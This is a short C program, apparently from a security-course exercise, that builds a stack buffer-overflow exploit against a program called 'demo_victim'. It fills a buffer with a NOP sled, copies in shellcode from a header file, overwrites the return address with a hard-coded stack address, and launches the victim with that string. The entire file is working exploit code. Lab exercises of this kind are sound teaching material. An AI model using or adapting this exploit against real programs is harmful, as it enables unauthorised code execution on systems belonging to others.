#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include "shellcode.h"

int main(int argc, char *argv[])
{
	char *args[3];
	char *env[1];

	if (argc != 2) {
		fprintf(stderr, "Usage: %s /path/to/demo_victim\n", argv[0]);
		exit(EXIT_FAILURE);
	}

#define EXPLEN 109
	char exp_str[EXPLEN];
	
	// Assemble your exploit string here
	for(int i = 0; i < EXPLEN; i++)
		exp_str[i] = 0x90;

	// NOP slide (or sled)
	strcpy(exp_str + (EXPLEN - strlen(shellcode) - 5), shellcode);

	// Address of buffer, needs to overwrite return address
	exp_str[104] = 0x94;
	exp_str[105] = 0xfd;
	exp_str[106] = 0xff;
	exp_str[107] = 0xbf;
	exp_str[108] = 0;

	args[0] = argv[1];
	args[1] = exp_str;
	args[2] = NULL;
	env[0] = NULL;

	if (execve(argv[1], args, env) < 0)
		err(EXIT_FAILURE, "Cannot execute %s", argv[1]);
	return EXIT_SUCCESS;
}